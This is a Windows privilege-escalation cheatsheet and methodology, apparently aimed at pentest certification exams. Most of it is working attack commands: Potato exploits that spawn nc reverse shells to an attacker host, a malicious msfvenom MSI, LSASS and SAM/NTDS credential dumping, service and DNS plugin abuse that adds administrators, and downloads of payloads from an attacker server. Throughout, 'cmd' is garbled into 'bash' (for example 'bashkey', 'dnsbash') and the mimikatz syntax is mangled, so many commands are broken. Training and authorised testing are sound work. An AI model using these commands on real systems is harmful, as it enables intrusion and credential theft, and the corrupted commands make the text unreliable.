Windows Privilege Escalation
Potato attacks, LSASS dumps, service binary swaps, and MSI installs as SYSTEM all write loud process-creation telemetry (EID 4688 / Sysmon 1). Assume Defender/EDR sees PrintSpoofer, GodPotato, mimikatz, and procdump -ma lsass. Prefer LOLBAS and built-in binaries when OPSEC matters.
Cheatsheet
Situational awareness (first 60 seconds)
# Who am I, what can I do, where am I
whoami /all
hostname
systeminfo
echo %USERNAME% & echo %USERDOMAIN%Enumeration quick-fire
# Users / groups / logged-on
net user
net user %USERNAME%
net localgroup
net localgroup <GROUP> # detailed info about the group
query user
bashkey /list
# Privileges (CRITICAL check before anything else)
whoami /priv
whoami /groups
# System / patches / installed software
systeminfo
wmic qfe list brief
wmic product get name,version
tasklist /svc
# Network / dual-homed / localhost-only services
ipconfig /all
route print
arp -a
netstat -ano
# Services / tasks / unquoted paths
sc query type= service state= all
wmic service get name,pathname,startmode,startname
wmic service get name,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
schtasks /query /fo LIST /v
# AlwaysInstallElevated (both must be 1)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Autologon / interesting registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"Credential hunting one-liners
# Config / history / unattend
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
dir /s /b C:\unattend.xml C:\Windows\Panther\Unattend.xml C:\Windows\system32\sysprep\unattend.xml 2>nul# PS history for every readable user profile
foreach ($u in (Get-ChildItem C:\Users -Directory).Name) {
Get-Content "C:\Users\$u\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -EA SilentlyContinue
}
# Local user / computer description fields (often hold passwords)
Get-LocalUser | Format-Table Name,Enabled,Description -AutoSize
Get-CimInstance Win32_OperatingSystem | Select-Object DescriptionAutomated enumeration
One-tool triage: latest winPEAS covers most Seatbelt/SharpUp checks run it first, then gap-fill. Prefer PrivescCheck when you can only run PowerShell (no EXE drop).
# Prefer C:\Windows\Temp or C:\Users\Public for writable drop paths
# Primary one pass, read red/yellow first
.\winPEASx64.exe bash quiet
# Gap-fill only if WinPEAS missed a class of check
.\Seatbelt.exe -group=all
.\SharpUp.exe audit# No-EXE path (IEX / copy-paste friendly) PrivescCheck
# Transfer PrivescCheck.ps1 first, or host it on <LHOST>
Set-ExecutionPolicy Bypass -Scope Process -Force
. .\PrivescCheck.ps1
Invoke-PrivescCheck -ExtendedInstant-win privilege abuse
# Integrity level
whoami /groups
# Spooler must be running for PrintSpoofer
sc query Spooler
# SeImpersonate / SeAssignPrimaryToken choose tool by OS
# JuicyPotato: Win7 / Server 2008-2016 (fails on Win10 1809+ / Server 2019+)
JuicyPotato.exe -l 1337 -p c:\windows\system32\bash.exe -a "/c c:\temp\nc.exe <LHOST> <LPORT> -e bash.exe" -t *
# PrintSpoofer: Win10 / Server 2016-2019 with Spooler up
PrintSpoofer.exe -i -c bash
PrintSpoofer.exe -c "c:\temp\nc.exe <LHOST> <LPORT> -e cmd.exe"
# GodPotato / SweetPotato: broader modern coverage when Juicy/PrintSpoofer fail
GodPotato.exe -bash "bash /c whoami"
GodPotato.exe -bash "c:\temp\nc.exe <LHOST> <LPORT> -e bash"
# Service account with SeImpersonate but "restricted" token (common IIS/MSSQL) restore privs first
FullPowers.exe -c "bash /c whoami /priv"
FullPowers.exe -c "c:\temp\PrintSpoofer.exe -c c:\temp\nc.exe <LHOST> <LPORT> -e bash"# SeDebugPrivilege dump LSASS or spawn SYSTEM child
procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp# SeTakeOwnershipPrivilege take file, grant self Full, read
takeown /f 'C:\path\to\sensitive.txt'
icacls 'C:\path\to\sensitive.txt' /grant %USERNAME%:F
type 'C:\path\to\sensitive.txt'Methodology
Ask before touching the keyboard: Which user am I? What privileges and groups? What OS/build and patch level? What defenses? What runs as SYSTEM that I can influence? What creds hide in files, history, registry, saved sessions? Every missed question is a missed SYSTEM.
Phase 0: Orientation
Ask yourself
- Who am I, and what do my privileges and group memberships actually allow?
- What OS, build, and patch level is this, and is it a domain-joined host, DC, or standalone?
- What defenses (Defender, EDR, AppLocker, WDAC, LSA protection) will see my next move?
- What hosts, shares, and services can this foothold reach that my attack box could not?
- What credentials, keys, or configs are readable from here?
- Which privesc or lateral path does the current evidence most cheaply enable?
# Orientation triad identity, host, free privilege wins
whoami /all
hostname & systeminfo
ipconfig /all & netstat -ano- Establish identity (
whoami /all) user, groups, privileges, integrity level. - If already in
Administratorsat High IL orNT AUTHORITY\SYSTEM→ stop privesc, go windows pillaging. - If in
Administratorsat Medium IL → you are UAC-filtered. Treat as not-yet-admin (see UAC notes) or find a path to High/SYSTEM. - Fingerprint host (OS name/version/build, domain vs workgroup, architecture, hotfixes).
- Inventory defenses before noisy tools (
Get-MpComputerStatus, AppLocker effective policy). - Map dual-homed interfaces, routes, ARP, and localhost-only listeners.
- Note writable drop directories (
C:\Windows\Temp,C:\Users\Public, user profile). - Rank candidate paths simplest and quietest first before committing.
Phase 1: Privileges & Dangerous Groups
Ask yourself
- Does
whoami /privshowSeImpersonate,SeAssignPrimaryToken,SeDebug,SeBackup/SeRestore,SeTakeOwnership, orSeLoadDriver? - Am I in Backup Operators, Server Operators, Print Operators, DnsAdmins, Hyper-V Administrators, or Event Log Readers?
- Is this a service-account foothold (IIS, MSSQL, Jenkins) where Potato-family abuse is the default next step?
- Which OS/build dictates JuicyPotato vs PrintSpoofer vs GodPotato?
- Why check privileges before WinPEAS? Because a single enabled privilege can end the engagement in under a minute.
# Privileges and group membership instant-win screen
whoami /priv
whoami /groups
sc query Spooler
net localgroup -
whoami /privifSeImpersonate/SeAssignPrimaryTokenpresent, go Potato immediately (tool by OS). - Service-account shell with SeImpersonate but missing expected privs / broken Potato → try FullPowers to spawn a normal token, then Potato again.
- Before PrintSpoofer:
sc query Spoolermust be RUNNING. If stopped and you cannot start it, use GodPotato/SweetPotato/RoguePotato instead. -
SeDebugPrivilege→ dump LSASS with ProcDump / Task Manager, or spawn SYSTEM via parent-process abuse. -
SeBackupPrivilege/SeRestorePrivilege(or Backup Operators) →reg saveSAM/SYSTEM, or diskshadow + copyNTDS.diton a DC. -
SeTakeOwnershipPrivilege→takeown+icaclson high-value files (web.config, creds, keys). -
SeLoadDriverPrivilege(Print Operators) → load vulnerable driver (Capcom.sys pattern). Note post-Win10 1803 HKCU restrictions. - Server Operators → rewrite a SYSTEM service
binPath, start it, get admin. - DnsAdmins →
dnsbash /config /serverlevelplugindll - Event Log Readers → mine Security 4688 command lines for
/userpasswords viawevtutil. - If no privilege/group win, continue to Phase 2.
Phase 2: Services, Tasks & Weak Permissions
Ask yourself
- Can I modify a service’s binary,
binPath, or registryImagePathas a non-admin? - Is any auto-start service path unquoted with a writable intermediate directory?
- Do scheduled tasks run as SYSTEM/Administrator with a writable script or Start In directory?
- Are both AlwaysInstallElevated registry values set to
1? - Can I start/stop the vulnerable service myself, or must I wait for reboot/admin action?
# Service / task / ACL / AlwaysInstallElevated checks
wmic service get name,pathname,startmode,startname
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Everyone" *
icacls "C:\Program Files (x86)\VulnerableApp\service.exe"
schtasks /query /fo LIST /v
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated- Enumerate services and flag those running as
LocalSystemwith non-C:\Windowspaths. - Weak service binary ACL (
Everyone/Users:(F)) → replace binary, start service, catch SYSTEM shell. - Weak service permissions (
SERVICE_ALL_ACCESS) →sc config <SVC> binpath= "bash /c ...", stop/start. - Unquoted path → place payload at first writable space-separated candidate. Confirm restart rights.
- Weak service registry ACL →
Set-ItemPropertyonImagePath. - Scheduled task as SYSTEM with writable script → append reverse shell / add-admin. Trigger or wait.
- AlwaysInstallElevated both
0x1→ malicious MSI viamsiexec /quiet /qn /norestart. - Autoruns (
HKLM\...\Run, startup folders) writable by your user → plant for next admin logon (may not be SYSTEM).
Phase 3: Credential Hunting
Ask yourself
- Which cleartext or encoded passwords exist in configs, history, unattend, registry, or sticky notes?
- Do
bashkey /listsaved creds let merunas /savecredor RDP as another user? - Can I decrypt a DPAPI-protected
Export-Clixmlcredential as the same user/machine? - Which recovered credential should I spray against local admin, WinRM, RDP, MSSQL, and domain next?
- Did I check every other user’s readable profile, not just my own?
# High-yield credential locations
bashkey /list
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
dir /s /b *unattend* *web.config *pass* *.kdbx *.vmdk *.vhdx 2>nul# History, PS creds, browser/dict leftovers
gc (Get-PSReadLineOption).HistorySavePath -EA SilentlyContinue
# If you find Export-Clixml creds as that user:
$c = Import-Clixml -Path 'C:\scripts\pass.xml'; $c.GetNetworkCredential() | fl *- PowerShell history for all readable users. Look for
/user,-p,ConvertTo-SecureString, net use. -
unattend.xml/ sysprep leftovers: plaintext or base64 passwords. -
web.config, app configs,.env, connection strings underC:\inetpuband Program Files. - Autologon (
DefaultUserName/DefaultPassword), PuTTY sessions, WiFi profiles (netsh wlan show profile key=clear). -
bashkey /list→runas /savecred /user:<USER> bash.exewhen applicable. - Sticky Notes DB (
plum.sqlite), browser stores (LaZagne), password managers,.rdpfiles. - Mount found
.vmdk/.vhdxbackups → extract SAM/SYSTEM →impacket-secretsdump LOCAL. - Recycle every recovered credential against local admins, WinRM, RDP, SQL, and other hosts before Phase 4.
Phase 4: Kernel, Vulnerable Software & Local Services
Ask yourself
- Does
systeminfo/ hotfix list match a known LPE, and have I confirmed the exact build? - Is a third-party service (backup agent, AV, VPN, monitoring forwarder) outdated with a public LPE?
- Are there localhost-only admin interfaces (FileZilla, Splunk UF, Erlang/RabbitMQ) reachable only from this shell?
- Have I exhausted privileges, groups, ACLs, and creds before touching a kernel exploit?
- What is the blast radius if the exploit bluescreens a production host?
# Patch / software / localhost attack surface
systeminfo
wmic qfe get HotFixID,InstalledOn
wmic product get name,version
tasklist /svc
netstat -ano | findstr LISTENING# On attack box: map systeminfo to known CVEs
wes.py systeminfo.txt
# Or Watson / Windows-Exploit-Suggester against the same output- Record exact OS build and installed KBs. Only pursue exploits whose prerequisites match.
- Prefer third-party service LPEs over kernel exploits when versions match (often more reliable).
- Probe localhost listeners (e.g. FileZilla admin, Splunk UF, Erlang 25672) for unauth or weak-cookie RCE as SYSTEM/service.
- Legacy hosts (XP/2003/2008/Win7): consider MS08-067 / MS17-010 via local port-forward if SMB is firewalled externally.
- GUI + unpatched Certificate Dialog → CVE-2019-1388 (
hhupd.exe) path if build is in range. - Kernel exploit only after documenting version match, OPSEC cost, and client approval on fragile hosts.
Phase 5: Automation Fallback & Recovery
Ask yourself
- What did WinPEAS/Seatbelt/SharpUp mark red or yellow that I have not manually validated?
- Which Phase 0–4 assumption failed, and what evidence contradicts it?
- Am I missing a dual-homed pivot, a readable share, or a credential I already found elsewhere?
- Should I re-run orientation after any new group/cred, instead of jumping to noisier tools?
# Full automated pass: validate every finding manually
.\winPEASx64.exe bash quiet > C:\Users\Public\wp.txt# If EXE blocked: PrivescCheck only
. .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended | Tee-Object C:\Users\Public\prc.txt# Gap-fill only after WinPEAS/PrivescCheck triage
.\Seatbelt.exe -group=all
.\SharpUp.exe audit- Run WinPEAS (or PrivescCheck if no EXE). Triage red/yellow only. Do not start with three overlapping tools.
- Gap-fill with Seatbelt/SharpUp/PowerUp only for unresolved classes of findings.
- Manually re-check every automated “hit”. Tools false-positive and false-negative.
- Re-walk Phase 0–3 with any new credentials or group changes.
- If stuck: re-read assumptions, try FullPowers → GodPotato, expand credential search to shares, take a break, then reassess from identity outward.
- Capture evidence (commands, output, screenshots, timestamps) for the report before cleanup.
- After SYSTEM → switch to Windows Pillaging (
donpapi/nxc/lsassy), not more local enum.
How It Works
Windows authorization is token-based. At logon the LSA builds an access token containing the user’s SID, group SIDs, and privileges. Every process inherits a copy. Privilege escalation means obtaining a more powerful token (SYSTEM/admin) or abusing a privilege already present on the current token.
Service accounts for IIS, MSSQL, and similar often receive SeImpersonatePrivilege so they can act on behalf of connecting clients. Potato-family attacks coerce a SYSTEM service into authenticating to an attacker-controlled pipe/COM object, then reuse that SYSTEM token to spawn a process. Dangerous built-in groups package powerful privileges (SeBackup/SeRestore, SeLoadDriver, service control) under a “least privilege” label that is still enough for domain or host compromise.
Misconfigured services are the other common path: the SCM launches binaries as SYSTEM. If a low-priv user can change the binary, the binPath, or a file the SYSTEM process loads (DLL hijack), they inherit SYSTEM. Credentials on disk short-circuit all of this. Password reuse often beats exploitation.
Reference
Dangerous privileges (quick map)
| Privilege | Typical abuse | Notes |
|---|---|---|
SeImpersonatePrivilege | JuicyPotato / PrintSpoofer / GodPotato / SweetPotato | Common on IIS/MSSQL service accounts |
SeAssignPrimaryTokenPrivilege | Same Potato family | Often paired with SeImpersonate |
SeDebugPrivilege | Dump LSASS. Spawn SYSTEM child via parent PID | Noisy. EDR loves this |
SeBackupPrivilege | Copy any file with backup semantics. reg save SAM/SYSTEM. NTDS via diskshadow | Backup Operators |
SeRestorePrivilege | Overwrite protected files. Plant services/DLL | Often with SeBackup |
SeTakeOwnershipPrivilege | takeown then rewrite ACL | Edge case but high value on locked files |
SeLoadDriverPrivilege | Load vulnerable kernel driver | Print Operators. Constrained since Win10 1803 |
SeCreateTokenPrivilege / SeTcbPrivilege | Arbitrary token / act as OS | Rare outside admin-equivalent |
Built-in groups that matter
| Group | Why it wins |
|---|---|
| Backup Operators | SeBackup/SeRestore. DC logon. NTDS.dit via diskshadow. SAM/SYSTEM hive save |
| Server Operators | Full control over many local services. Rewrite binPath as SYSTEM |
| Print Operators | SeLoadDriverPrivilege. DC logon |
| DnsAdmins | Load arbitrary DNS plugin DLL as SYSTEM (DC impact). WPAD record abuse |
| Hyper-V Administrators | VM disk access / DC clone. Hard-link races on older builds |
| Event Log Readers | Read Security log harvest passwords from 4688 command lines |
SeImpersonate / Potato tool selection
| Target | Prefer | Avoid |
|---|---|---|
| Win7 / Server 2008–2016 | JuicyPotato | |
| Win10 / Server 2019 with Spooler | PrintSpoofer, RoguePotato | JuicyPotato (broken post-1809) |
| Modern / hardened / Spooler dead | GodPotato, SweetPotato | Assuming one tool works everywhere |
# JuicyPotato: COM CLSID abuse (older hosts)
JuicyPotato.exe -l 53375 -p c:\windows\system32\bash.exe -a "/c c:\temp\nc.exe <LHOST> <LPORT> -e bash.exe" -t *
# PrintSpoofer: printer spooler named pipe
PrintSpoofer.exe -i -c bash
PrintSpoofer.exe -c "c:\temp\nc.exe <LHOST> <LPORT> -e bash"
# GodPotato: broad modern fallback
GodPotato.exe -bash "c:\temp\nc.exe <LHOST> <LPORT> -e bash"SeBackupPrivilege: SAM / NTDS
# Enable + copy protected file (SeBackupPrivilege PoC modules)
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegebashLets.dll
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege 'C:\Confidential\secret.txt' .\secret.txt# Local SAM/SYSTEM (works with SeBackup)
reg save HKLM\SAM C:\temp\SAM.SAV
reg save HKLM\SYSTEM C:\temp\SYSTEM.SAV
reg save HKLM\SECURITY C:\temp\SECURITY.SAV# DC: shadow copy then copy NTDS.dit (diskshadow interactive)
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup# After expose: backup-mode copy (no external DLL needed)
robocopy /B E:\Windows\NTDS C:\temp\ntds ntds.dit# Offline hash extraction
impacket-secretsdump -sam SAM.SAV -system SYSTEM.SAV LOCAL
impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV LOCALSeDebugPrivilege
# Dump LSASS (transfer dump offline if Mimikatz blocked on-box)
procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp# Mimikatz against the dump (prefer offline)
privilege#debug
sekurlsa#minidump lsass.dmp
sekurlsa#logonpasswordsGUI alternative with RDP: Task Manager → Details → lsass.exe → Create dump file.
Server Operators: service binPath
sc qc AppReadiness
sc config AppReadiness binPath= "bash /c net localgroup Administrators <USER> /add"
sc start AppReadiness
net localgroup Administrators
# Revert binPath after proofDnsAdmins: plugin DLL
Restarting DNS on a DC can take down name resolution for the environment. Get explicit approval, have a cleanup plan, and prefer a non-destructive proof when the client allows it.
# Full path required
dnsbash.exe /config /serverlevelplugindll C:\Users\<USER>\adduser.dll
sc stop dns
sc start dns
# Cleanup from elevated admin context
reg delete HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll /f
sc start dnsWPAD alternative (also DnsAdmins):
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName <DC>
Add-DnsServerResourceRecordA -Name wpad -ZoneName <DOMAIN> -ComputerName <DC> -IPv4Address <LHOST>Weak service permissions
# Find writable service configs / binaries
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -quvcw <ServiceName>
icacls "C:\Program Files (x86)\App\service.exe"
# Abuse SERVICE_CHANGE_CONFIG
sc config <ServiceName> binpath= "bash /c net localgroup administrators <USER> /add"
sc stop <ServiceName>
sc start <ServiceName>Unquoted service path
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
sc qc <ServiceName>
# If path is C:\Program Files (x86)\Vulnerable App\svc.exe
# and you can write C:\Program Files (x86)\Vulnerable.exe. Plant payload thereExploitable only when an intermediate directory is writable and you can restart the service (or wait for reboot). Root of C:\ and Program Files usually need admin. Many unquoted paths are not exploitable.
AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated# Both values must be 0x1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f msi -o aie.msimsiexec /i C:\Users\Public\aie.msi /quiet /qn /norestartScheduled tasks
schtasks /query /fo LIST /v
icacls C:\Scripts\
# If Users:(W) on a SYSTEM-run script: append payload, wait or:
schtasks /run /tn "<TaskName>"Get-ScheduledTask | Where-Object { $_.Principal.UserId -match 'SYSTEM|Administrator' } |
Select-Object TaskName,TaskPath,StateLow-priv users often cannot read C:\Windows\System32\Tasks. Custom tasks in world-writable directories are the real prize.
Credential locations (extended)
| Location | Command / path |
|---|---|
| PS history | %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt |
| Unattend | C:\Windows\Panther\Unattend.xml, C:\Windows\system32\sysprep\ |
| IIS | C:\inetpub\wwwroot\web.config (and other sites) |
| Autologon | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon |
| Saved sessions | bashkey /list. PuTTY / WinSCP / FileZilla / RDP files |
| Sticky Notes | ...\Microsoft.MicrosoftStickyNotes_*\LocalState\plum.sqlite |
| WiFi | netsh wlan show profiles then key=clear |
| VHD/VMDK backups | guestmount / Disk Management → SAM/SYSTEM → secretsdump |
| Registry password sweep | reg query HKLM /f password /t REG_SZ /s |
# DPAPI PSCredential XML: only as the same user/machine that created it
$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
$credential.GetNetworkCredential().UserName
$credential.GetNetworkCredential().Password# Event Log Readers: passwords in process command lines
wevtutil qe Security /rd:true /f:text | findstr /i "/user"DLL hijacking (summary)
Order of abuse checks:
- Application directory missing DLL that the SYSTEM/auto-start app loads.
- Writable directory earlier in
%PATH%than the real DLL location. - Knowndlls / SafeDllSearchMode may block trivial plants. Confirm load path with Procmon (
NAME NOT FOUND/PATH NOT FOUND).
Proxy DLLs and reflective injection are situational. For exam/lab privesc, prefer missing-DLL plants on auto-start SYSTEM services.
Localhost & vulnerable services
netstat -ano | findstr LISTENING
# Prioritize 127.0.0.1 / #1 listeners not bound on 0.0.0.0High-value patterns from assessments:
- FileZilla admin port (often 14147 on loopback): config/password exposure, filesystem access as service user.
- Splunk Universal Forwarder: historically unauth app deploy as SYSTEM.
- Erlang distribution port (25672): weak/default cookie (
rabbiton RabbitMQ) → cluster join → RCE.
Kernel & notable CVEs
Prefer wes-ng / Watson against live systeminfo output over memorized CVE tables. Confirm build + patch level before running any kernel PoC. last verified: 2026-08
| Bug | Use as LPE when |
|---|---|
| MS08-067 / MS17-010 | Legacy hosts. Forward local 445 if firewalled externally |
| CVE-2019-1388 | GUI access + vulnerable cert dialog (hhupd.exe) |
| CVE-2020-0668 etc. | Matching unpatched build. Validate with suggester first |
Kernel exploits are last in the methodology for a reason: stability risk, AV signature density, and frequent patch status.
UAC notes (CPTS trap)
Membership in Administrators with a Medium integrity token is not full admin. Privileged operations need High integrity (elevated) or a UAC bypass. Print Operators often need an elevated token before SeLoadDriverPrivilege appears. Prefer finding a path that yields a High/SYSTEM token over fighting UAC unless GUI/RDP is available and bypasses are in scope.
# Spot the trap
whoami /groups
# Look for: BUILTIN\Administrators ... Group used for deny only
# And: Mandatory Label\Medium Mandatory Level (not High)Practical exam escapes when you are “admin but not elevated”:
| Situation | Move |
|---|---|
| Have cleartext/NTLM for a local admin | runas / evil-winrm / nxc / impacket-psexec for a fresh High/SYSTEM session |
| SeImpersonate present | Potato → SYSTEM (skips UAC entirely) |
| Writable SYSTEM service / AlwaysInstallElevated | Abuse → SYSTEM |
| GUI/RDP + creds | ”Run as administrator” or scheduled task created as admin |
| Only Medium admin, no other path | Fodhelper/other UAC bypasses if in scope. Last resort vs finding another vector |
On CPTS, landing bob who is in local Administrators but your web shell is Medium IL is common. Do not spend an hour “enumerating privesc”. Get a proper admin session with the password/hash you already have (evil-winrm, runas, WinRM, PsExec-style).
FullPowers (restricted service tokens)
IIS / MSSQL / service shells sometimes show SeImpersonatePrivilege but Potato fails or many privileges appear disabled because the token is restricted. FullPowers recovers a full token for the same user, after which PrintSpoofer/GodPotato usually work.
FullPowers.exe -c "bash /c whoami /all"
FullPowers.exe -c "c:\temp\GodPotato.exe -bash \"c:\temp\nc.exe <LHOST> <LPORT> -e bash\""CPTS: common foothold → SYSTEM chains
| Foothold | First check | Typical win |
|---|---|---|
xp_bashshell / MSSQL | whoami /priv | SeImpersonate → PrintSpoofer/GodPotato |
IIS / wwwroot webshell | App-pool identity privs | Same Potato path. FullPowers if restricted |
| Uploaded binary as low-priv user | Groups + file creds | AlwaysInstallElevated, weak service, history/Autologon |
| RDP as domain user | Local admin group? Medium IL? | Cred reuse / Potato / ACL misconfig |
| Backup Operators on DC | SeBackup | diskshadow + NTDS → domain hashes |
After SYSTEM on a domain-joined host, do not stop. Pillage (especially LSASS / logged-on admins) and spray. Local SYSTEM is a waypoint, not the CPTS finish line.
Automated tools
| Tool | Role | Prefer when |
|---|---|---|
| winPEAS | Broad local enum (Seatbelt-class checks folded in) | Default first automated pass. Read red/yellow |
| PrivescCheck | PS misconfig enum, structured output | EXE blocked / PS-only shell |
| FullPowers | Restore full service token | IIS/MSSQL Potato fails / privs look stripped |
| GodPotato | SeImpersonate → SYSTEM | Modern Windows. Spooler dead or PrintSpoofer fails |
| Seatbelt | Targeted host/security checks | Gap-fill after WinPEAS |
| SharpUp / PowerUp | Misconfig-focused checks + abuse helpers | Gap-fill / no WinPEAS binary |
| Watson / WES-NG | Missing KB → CVE mapping | After misconfigs exhausted |
| AccessChk / PsService (Sysinternals) | Service and ACL truth | Validate WinPEAS “writable service” hits |
Post-SYSTEM credential harvest is not this note. Use DonPAPI / nxc / lsassy in Windows Pillaging.
Upload to C:\Windows\Temp or C:\Users\Public when user-writable dirs are scarce. Compile from source for client work. Public binaries are signatured.
File transfer reminders
# Target-side fetch examples: see File-Transfers note for full catalogue
certutil -urlcache -f http://<LHOST>/<FILE> C:\Windows\Temp\<FILE>
powershell -c "IWR http://<LHOST>/<FILE> -OutFile C:\Windows\Temp\<FILE>"Common Mistakes
- Running WinPEAS before
whoami /privand missing an instant Potato win on a service account. - Launching WinPEAS + Seatbelt + SharpUp + PowerUp together. Use one triage tool first, then gap-fill later.
- Using JuicyPotato on Server 2019 / Win10 1809+ instead of PrintSpoofer/GodPotato.
- PrintSpoofer against a stopped Spooler. Check
sc query Spooleror switch to GodPotato. - Treating Medium-IL local Administrators membership as “already done” and never getting a High/SYSTEM token.
- Potato failing on IIS/MSSQL without trying FullPowers on a restricted service token.
- Treating every unquoted service path as exploitable without confirming a writable intermediate path and restart rights.
- Kernel exploits before privileges, groups, service ACLs, and credential reuse.
- Stopping at local SYSTEM on a domain-joined host instead of pillaging (
donpapi/nxc/lsassy) and moving laterally. - Not recycling discovered credentials against WinRM, RDP, MSSQL, and other hosts.
- DnsAdmins / diskshadow / service binPath changes without cleanup or client approval.
- Leaving replaced service binaries, MSI payloads, or plugin DLL registry keys behind.
Quiz
You landed a shell as nt service\mssql$sqlexpress on Server 2019. whoami /priv shows SeImpersonatePrivilege Enabled. What is the best next move?
Quiz
whoami /groups shows Backup Operators on a Domain Controller. Which action correctly abuses the access?
Quiz
SharpUp reports an unquoted auto-start SYSTEM service at C:\\Program Files (x86)\\Vuln App\\svc.exe. icacls shows you cannot write under Program Files or C:\\. What do you do?
Quiz
whoami /groups shows BUILTIN\\Administrators (Group used for deny only) and Mandatory Label\\Medium Mandatory Level. You also have the user's password. Best CPTS move?
#Windows #PrivilegeEscalation #RedTeam #PenetrationTesting #HTB #OSCP #PostExploitation #AccessControl #TokenAbuse #ServiceAccounts #ActiveDirectory #DPAPI #System #CPT #BlueTeam #Sysmon #Enumeration #LPE #Certification #CredentialAccess